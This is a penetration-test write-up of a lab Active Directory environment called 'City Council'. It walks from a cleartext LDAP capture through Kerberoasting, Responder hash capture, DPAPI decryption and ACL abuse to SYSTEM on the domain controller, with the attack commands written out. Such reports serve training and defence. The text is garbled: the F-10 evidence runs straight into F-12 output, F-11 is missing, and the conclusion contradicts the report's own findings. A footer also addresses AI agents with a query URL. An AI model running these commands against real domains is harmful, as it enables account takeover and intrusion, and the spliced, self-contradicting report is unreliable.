# City Council | Pentest Report {% embed url="" %} ## Internal Active Directory Penetration Test ## City Council Infrastructure | Field | Value | | --------------- | --------------------------------- | | Client | City Council | | Assessment Type | Internal Network Penetration Test | | Testing Model | Black Box | | Environment | HackSmarterLabs | | Assessor | Dragkob | | Date | March 2026 | *** ## Table of Contents 1. Executive Summary 2. Scope of Engagement 3. Business Impact 4. Methodology 5. Risk Rating Methodology 6. Attack Path Overview 7. Summary of Findings * F-01 – Cleartext LDAP Credential Exposure * F-02 – Kerberoastable Service Accounts * F-03 – Writable SMB Share * F-04 – NTLM Credential Capture * F-05 – Weak Password Policy * F-06 – Backup Archive Exposure * F-07 – PowerShell History Credential Exposure * F-08 – DPAPI Credential Extraction * F-09 – Active Directory ACL Misconfiguration * F-10 – Active Directory Privilege Escalation (web\_admin) * F-11 – IIS File Upload Leading to Remote Code Execution * F-12 – Privilege Escalation to NT AUTHORITY\SYSTEM 8. Tools Used 9. Conclusion *** ## Executive Summary An internal penetration test was conducted against the City Council Active Directory environment to assess the organization's resilience against internal threats. During the assessment, the tester successfully compromised the Domain Controller and obtained `NT AUTHORITY\SYSTEM` privileges through a chained series of vulnerabilities including: * Cleartext LDAP credential exposure * Kerberos service ticket abuse * NTLM credential capture * Weak password cracking * Backup archive exposure * DPAPI credential extraction * Active Directory ACL misconfiguration * Web server file upload abuse * Privilege escalation vulnerabilities These weaknesses allowed a simulated attacker to progress from unauthenticated network access to full domain compromise. Failure to remediate these issues could allow attackers to: * Obtain domain administrator privileges * Access sensitive municipal records * Deploy ransomware * Manipulate Active Directory permissions * Persist within the network environment Immediate remediation is recommended. *** ## Scope of Engagement | Asset | Role | IP | Domain | | ---------------- | ------------------------------ | ----------- | ---------- | | DC-CC.city.local | Domain Controller / Web Server | 10.1.134.65 | city.local | {% hint style="info" %} No denial-of-service attacks or destructive testing were performed during this engagement. {% endhint %} *** ## Business Impact The vulnerabilities identified during this assessment allow an attacker to progress from unauthenticated network access to full Domain Controller compromise. Successful exploitation could enable attackers to: * Obtain Domain Administrator-level control * Access sensitive municipal records * Manipulate Active Directory permissions * Deploy ransomware across the network * Disable security controls * Maintain persistent access within the environment Because the Domain Controller manages authentication and authorization for the entire network, compromise of this system effectively results in complete control of the City Council infrastructure. Failure to remediate these issues may expose the organization to data breaches, operational disruption, and reputational damage. *** ## Methodology Testing followed an industry standard methodology aligned with: * PTES * OWASP Testing Guide * NIST SP 800-115 | Phase | Description | | -------------------- | ------------------------------------------- | | Reconnaissance | Identification of live hosts and services | | Enumeration | Discovery of domain objects and credentials | | Exploitation | Abuse of vulnerabilities | | Credential Access | Password cracking and credential extraction | | Lateral Movement | Movement between accounts | | Privilege Escalation | Obtaining administrative privileges | | Post Exploitation | Demonstrating full compromise | *** ## Risk Rating Methodology Vulnerabilities are scored using the Common Vulnerability Scoring System (CVSS v3.1). | Severity | CVSS Score | | -------- | ---------- | | Critical | 9.0 – 10.0 | | High | 7.0 – 8.9 | | Medium | 4.0 – 6.9 | | Low | 0.1 – 3.9 | Risk severity considers: * Attack complexity * Privilege requirements * User interaction * Confidentiality impact * Integrity impact * Availability impact *** ## Attack Path Overview The domain compromise occurred through the following chain: ``` F-01 Cleartext LDAP Credential Exposure ↓ Compromise of svc_services_portal service account ↓ Active Directory Enumeration (BloodHound) ↓ F-02 Kerberoasting Attack ↓ Compromise of clerk.john account ↓ F-03 Writable SMB Share (Uploads) ↓ F-04 NTLMv2 Credential Capture via Responder ↓ Compromise of jon.peters account ↓ F-05 Kerberoasting Additional Users ↓ Compromise of nina.soto and maria.clerk accounts ↓ F-06 Backup Share Exposure ↓ Extraction of User Profile Backups ↓ F-07 PowerShell History Credential Exposure ↓ F-08 DPAPI Credential Decryption ↓ Compromise of emma.hayes account ↓ F-09 Active Directory ACL Abuse (WriteDACL → FullControl) ↓ Password Reset and Enablement of sam.brooks account ↓ Remote Access via WinRM ↓ F-10 Active Directory Privilege Escalation (GenericWrite → web_admin) ↓ Reset of web_admin account password ↓ F-11 IIS File Upload → ASPX Webshell Execution ↓ Remote Code Execution on Domain Controller ↓ F-12 Privilege Escalation via SeImpersonate (Named Pipe Impersonation) ↓ NT AUTHORITY\SYSTEM on Domain Controller ``` *** ## Summary of Findings
IDVulnerabilitySeverityCVSS
F-01Cleartext LDAP Credential ExposureHigh8.2
F-02Kerberoastable Service AccountsHigh8.0
F-03Writable SMB ShareMedium6.5
F-04NTLM Credential CaptureHigh8.5
F-05Weak Password PolicyHigh7.8
F-06Backup Archive ExposureMedium6.9
F-07PowerShell History Credential ExposureHigh8.1
F-08DPAPI Credential ExtractionHigh8.4
F-09Active Directory ACL MisconfigurationCritical9.3
F-10Active Directory Privilege Escalation via GenericWrite on web_adminCritical9.8
F-11IIS File Upload Leading to Remote Code ExecutionCritical9.8
F-12Privilege Escalation to NT AUTHORITY\SYSTEM via Named Pipe ImpersonationCritical9.8
*** ## F-01 – Cleartext LDAP Credential Exposure **Severity:** High\ **CVSS:** 8.2\ **Vector:** AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N ### Description The municipal web application used by the City Council communicates with the Domain Controller through LDAP authentication. During testing it was discovered that the application sends authentication credentials over an unencrypted LDAP connection. Because LDAP traffic was transmitted in plaintext, credentials were observable in network traffic. An attacker monitoring network traffic could intercept the authentication request and extract valid domain credentials.
### Technical Evidence Network traffic was captured using Wireshark while submitting a request through the municipal service portal. Captured authentication string: ``` DPUSER=svc_services_portal PASS=[REDACTED] DOMAIN=city.local ``` The captured credentials belonged to the service account: ``` svc_services_portal ``` These credentials allowed authenticated enumeration of the Active Directory domain.
### Impact Exposure of service account credentials allows attackers to: * Authenticate to Active Directory * Enumerate domain users and groups * Identify privilege escalation paths * Launch Kerberos attacks such as Kerberoasting This vulnerability enabled the initial foothold within the domain environment. ### Remediation * Enforce LDAPS (LDAP over TLS) for all authentication traffic * Disable plaintext LDAP authentication * Rotate exposed service account credentials * Monitor authentication logs for suspicious activity *** ## F-02 – Kerberoastable Service Accounts **Severity:** High\ **CVSS:** 8.0\ **Vector:** AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N ### Description Active Directory enumeration revealed multiple accounts configured with Service Principal Names (SPNs). Accounts with SPNs can be targeted using a Kerberos attack technique known as Kerberoasting, where attackers request service tickets and attempt to crack the encrypted ticket offline to recover the account password. ### Technical Evidence Kerberos service tickets were requested using: ``` GetUserSPNs.py ``` Example command: ``` GetUserSPNs.py city.local/svc_services_portal:[REDACTED] -dc-ip 10.1.134.65 -request ``` The following Kerberoastable account were identified: `clerk.john` Extracted Kerberos ticket hashes were cracked offline using: ``` john --wordlist=rockyou.txt hashes.txt ``` Recovered passwords: ``` clerk.john : [REDACTED] ``` ### Impact Successful Kerberoasting allows attackers to recover passwords for service accounts without generating authentication alerts. These credentials can be used to: * Authenticate to domain services * Enumerate additional domain resources * Escalate privileges * Move laterally within the network ### Remediation * Use long complex passwords for service accounts * Implement Managed Service Accounts (MSA / gMSA) * Monitor Kerberos ticket requests * Rotate service account credentials regularly *** ## F-03 – Writable SMB Share **Severity:** Medium\ **CVSS:** 6.5\ **Vector:** AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N ### Description The Domain Controller exposes an SMB share named `Uploads` which allows authenticated users to upload files. The account `clerk.john` was able to write files to this share. Writable shares can be abused by attackers to upload malicious files designed to trigger authentication attempts from other users. ### Technical Evidence SMB enumeration using nxc revealed: ``` Uploads (READ, WRITE) ``` Example enumeration command: ``` nxc smb 10.1.134.65 -u clerk.john -p [REDACTED] --shares ``` Files present within the share included internal documentation such as: ``` Staff_Contacts.txt Council_Draft.txt ``` The attacker was able to upload arbitrary files to the share. ### Impact Writable SMB shares can be abused to: * Deliver malicious files * Trigger authentication attempts * Capture NTLM credentials * Execute phishing attacks within internal networks ### Remediation * Remove write permissions from non-administrative users * Apply least privilege access control * Monitor file uploads within SMB shares *** ## F-04 – NTLM Credential Capture **Severity:** High\ **CVSS:** 8.5\ **Vector:** AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N ### Description By uploading authentication-triggering files to the writable SMB share using `NTLMTheft.py`, the attacker was able to capture NTLM authentication hashes from another domain user. ### Technical Evidence Authentication capture was performed using Responder. ``` responder -I eth0 ``` Captured NTLMv2 hash: ``` CITY\jon.peters ``` The captured hash was cracked offline.
### Impact Compromised credentials allow attackers to: * Authenticate to internal systems * Access network shares * Perform additional enumeration * Escalate privileges within the domain ### Remediation * Disable LLMNR and NetBIOS name resolution * Enforce SMB signing * Implement NTLM authentication restrictions * Deploy monitoring for poisoning attacks *** ## F-05 – Weak Password Policy **Severity:** High\ **CVSS:** 7.8\ **Vector:** AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N ### Description Several domain accounts were protected by weak passwords that could be cracked using publicly available wordlists. After compromising the account jon.peters through NTLM credential capture (F-04), the attacker performed additional Active Directory enumeration. Using the compromised credentials, a Kerberoasting attack was executed to request Kerberos service tickets for accounts with Service Principal Names (SPNs). These service tickets can be exported and cracked offline to recover plaintext passwords. Two service accounts were identified as Kerberoastable and their service ticket hashes were successfully cracked. ### Technical Evidence Kerberos service tickets were requested using the compromised credentials: ``` targetedKerberoast.py -d city.local -u jon.peters -p [REDACTED] --dc-ip 10.1.134.65 ``` Recovered Kerberos service ticket hashes were saved to: `hashes.txt` The hashes were cracked offline using John the Ripper: ``` john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt ``` Recovered credentials: | Account | Password | | ----------- | ----------- | | maria.clerk | \[REDACTED] | | nina.soto | \[REDACTED] | These credentials provided additional access to internal network resources, including the Backups SMB share. ### Impact Weak passwords significantly reduce the effort required for attackers to compromise domain accounts once password hashes are obtained. An attacker with the ability to request Kerberos service tickets can perform offline password cracking attacks without generating authentication failures or alerts. Successful cracking of these credentials enabled the attacker to: * Access additional SMB shares * Retrieve sensitive backup archives * Extract further credential material * Continue privilege escalation within the domain ### Remediation * Enforce strong password complexity requirements * Require longer passwords (minimum 14 characters) * Implement password expiration and rotation policies * Use Managed Service Accounts (gMSA) for service accounts * Monitor Kerberos ticket requests for suspicious activity *** ## F-06 – Backup Archive Exposure **Severity**: Medium\ **CVSS**: 6.9\ **Vector**: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N ### Description The Backups SMB share contained user profile backup archives accessible to a standard domain user. These archives contained sensitive user data including emails, credential artifacts, and configuration files. ### Technical Evidence Accessible files included: ``` sam.brooks_ProfileBackup_0729.wim clerk.john_ProfileBackup_0729.wim ``` These archives were downloaded and extracted during testing. ### Impact Backup archives may contain: * credentials * authentication tokens * sensitive corporate information This information can assist attackers in privilege escalation. ### Remediation * Restrict access to backup storage * Encrypt backup archives * Implement access auditing for backup shares *** ## F-07 – PowerShell History Credential Exposure **Severity:** High\ **CVSS:** 8.1\ **Vector:** AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N ### Description Analysis of extracted profile backups revealed PowerShell command history files containing credentials. Storing passwords within PowerShell command history exposes sensitive authentication information to attackers. ### Technical Evidence PowerShell history file identified: ``` ConsoleHost_history.txt ``` The file contained commands including credentials used for administrative tasks. Recovered credentials: | Account | Password | | ---------- | ----------- | | emma.hayes | \[REDACTED] |
### Impact Exposure of credentials in PowerShell history allows attackers to recover sensitive authentication material without requiring password cracking or privilege escalation. Because the compromised account possessed elevated Active Directory privileges, this exposure enabled the attacker to: * Modify Active Directory permissions * Reset user passwords * Enable disabled accounts * Escalate privileges within the domain ### Remediation * Avoid including passwords directly in PowerShell commands * Use secure credential objects (`Get-Credential`) * Disable PowerShell history logging on administrative systems where appropriate * Periodically clear PowerShell history files * Implement privileged access management solutions *** ## F-08 – DPAPI Credential Extraction **Severity**: High\ **CVSS**: 8.4\ **Vector**: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N ### Description Credential artifacts stored within user profiles were protected using the Windows Data Protection API (DPAPI). Because the attacker obtained the user password, DPAPI master keys could be decrypted, revealing stored credentials. ### Technical Evidence Credential files extracted: ``` AppData\Roaming\Microsoft\Credentials ``` Master key extracted from: ``` AppData\Roaming\Microsoft\Protect ``` Credentials were decrypted using: ``` impacket-dpapi ``` Recovered credentials: ``` emma.hayes : [REDACTED] ```
### Impact DPAPI credential recovery allows attackers to obtain stored passwords and authentication tokens. ### Remediation * Avoid storing credentials locally * Use credential vaults or secure authentication mechanisms * Monitor credential access activity *** ## F-09 – Active Directory ACL Misconfiguration **Severity:** Critical\ **CVSS:** 9.3\ **Vector:** AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N ### Description The domain account `emma.hayes` possessed excessive privileges within Active Directory. Specifically, the account had WriteDACL permissions on the Organizational Unit (OU) **`CityOps`**. WriteDACL permissions allow a user to modify the Access Control List (ACL) of an Active Directory object. An attacker who compromises an account with WriteDACL permissions can modify the ACL to grant themselves Full Control over the object and any objects within it. During the assessment, the attacker abused this permission to grant **FullControl** rights to the `emma.hayes` account on the CityOps OU, enabling administrative control over user accounts contained within that OU. This allowed the attacker to reset passwords for multiple domain accounts within the OU and gain unauthorized access. ### Technical Evidence Initial enumeration revealed that the account **emma.hayes** possessed the permission: ``` WriteDACL on OU=CityOps ``` The attacker modified the ACL of the CityOps OU using **Impacket dacledit**: ``` impacket-dacledit -action 'write' -rights 'FullControl' -inheritance \ -principal 'EMMA.HAYES' \ -target-dn 'OU=CITYOPS,DC=CITY,DC=LOCAL' \ 'city.local'/'EMMA.HAYES':'[REDACTED]' ``` After obtaining **FullControl** over the OU, the attacker reset passwords for user accounts located within the CityOps OU: ``` net rpc password sam.brooks \ -U 'city.local/emma.hayes%[REDACTED]' \ -S 10.1.1.109 ``` ``` net rpc password ALEX.KING \ -U 'city.local/emma.hayes%[REDACTED]' \ -S 10.1.1.109 ``` ``` net rpc password RITA.CHO \ -U 'city.local/emma.hayes%[REDACTED]' \ -S 10.1.1.109 ``` Password resets were successful, granting the attacker control of the affected accounts. However, the `sam.brooks` account was initially disabled. Verification attempt: ``` nxc smb 10.1.1.109 -u sam.brooks -p '[REDACTED]' --shares ``` Result: ``` STATUS_ACCOUNT_DISABLED ``` The attacker then enabled the account using **bloodyAD**: ``` bloodyAD --host 10.1.1.109 -d city.local \ -u emma.hayes -p '[REDACTED]' \ remove uac 'sam.brooks' -f ACCOUNTDISABLE ``` Output: ``` ACCOUNTDISABLE flag removed from sam.brooks ``` After enabling the account, the attacker authenticated successfully using WinRM: ``` evil-winrm -u sam.brooks -p [REDACTED] -i 10.1.1.109 ``` This provided remote command execution on the Domain Controller. ### Impact Improper Active Directory permissions allow attackers to escalate privileges and gain control over additional domain accounts. By abusing the WriteDACL permission, the attacker was able to: * Grant themselves FullControl over the CityOps OU * Reset passwords for multiple user accounts * Enable disabled accounts * Obtain remote shell access to the Domain Controller This vulnerability enabled privilege escalation and lateral movement within the domain, ultimately leading to full system compromise. ### Remediation * Review Active Directory ACL permissions regularly * Remove unnecessary WriteDACL and GenericWrite privileges * Implement the principle of least privilege * Use Privileged Access Management (PAM) for administrative accounts * Monitor changes to Active Directory permissions *** ## F-10 – Active Directory Privilege Escalation via GenericWrite on web\_admin **Severity:** Critical\ **CVSS:** 9.8\ **Vector:** AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N ### Description Active Directory enumeration revealed that the account emma.hayes possessed GenericWrite permissions on the `web_admin` user account. GenericWrite permissions allow modification of attributes of the target object. This includes changing the object's distinguishedName, enabling attackers to move the object to another Organizational Unit (OU). During the assessment, the attacker abused this permission to move the web\_admin account into the CityOps OU, which was already controlled by the attacker through the WriteDACL abuse described in F-09. Once the account was moved into the controlled OU, the attacker reset the password for the `web_admin` account and gained control of the account. ### Technical Evidence The attacker moved the user object into the CityOps OU: ```bash cat < getsystem ``` Result: ``` ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)). ``` Privilege verification confirmed SYSTEM access: ``` hostname ``` Output: ``` DC-CC ``` User verification: ``` whoami ``` Output: ``` nt authority\system ``` This confirmed that the attacker had obtained full operating system privileges on the Domain Controller. ### Impact Successful privilege escalation to SYSTEM allows an attacker to: * Execute commands with full administrative privileges * Access and modify all files on the system * Manipulate security policies * Extract domain credentials * Maintain persistent access within the environment Because the compromised system is the Domain Controller, this level of access effectively grants the attacker complete control over the Active Directory domain. ### Remediation * Disable unnecessary services such as the Print Spooler on Domain Controllers * Apply the latest Windows security updates * Restrict privileges assigned to service accounts * Deploy endpoint detection capable of identifying privilege escalation techniques * Monitor for suspicious process spawning and named pipe activity *** ## Tools Used The following tools were used during the engagement to perform reconnaissance, enumeration, exploitation, credential access, and post-exploitation activities within the assessment scope. | Tool | Category | Purpose | | -------------------- | -------------------------------- | -------------------------------------------------------------------------------- | | Nmap | Network Reconnaissance | Identification of open ports, services, and system fingerprinting | | Wireshark | Network Analysis | Capturing and analyzing network traffic to identify credential exposure | | BloodHound | Active Directory Enumeration | Mapping privilege relationships and identifying attack paths in Active Directory | | BloodHound-python | AD Data Collection | Collecting Active Directory data for BloodHound analysis | | Impacket | Active Directory Attacks | Kerberoasting, DPAPI extraction, and AD interaction | | Responder | Credential Harvesting | Capturing NTLM authentication hashes from network traffic | | ntlm\_theft | Credential Harvesting | Generating malicious files to trigger NTLM authentication attempts | | John the Ripper | Password Cracking | Offline cracking of Kerberos and NTLM password hashes | | smbclient | SMB Interaction | Downloading and uploading files to SMB shares | | NetExec (nxc) | Network Enumeration | Verifying credentials and enumerating SMB services | | BloodyAD | Active Directory Exploitation | Manipulating AD permissions and modifying user attributes | | Evil-WinRM | Remote Access | Establishing remote PowerShell sessions via WinRM | | RunasCs | Privilege Abuse | Executing commands under another user context | | Metasploit Framework | Exploitation / Post-Exploitation | Establishing Meterpreter sessions and privilege escalation | | msfvenom | Payload Generation | Creating malicious ASPX payloads | | Netcat | Network Utility | Reverse shell listener for remote connections | | Python HTTP Server | File Hosting | Hosting payloads for download during exploitation | *** ## Conclusion The assessment demonstrated that misconfigured SMB shares combined with NTLM authentication exposure can lead to credential compromise within the City Council environment. Although the compromise was limited to a user account during testing, similar weaknesses could be leveraged by attackers to escalate privileges and gain deeper access to the network. Addressing these issues through improved access controls, stronger authentication mechanisms, and hardened SMB configurations will significantly improve the organization’s security posture. ***

Copyright © 2026 Dragkob. All Rights Reserved.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.dragkob.com/hacksmarter/city-council.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.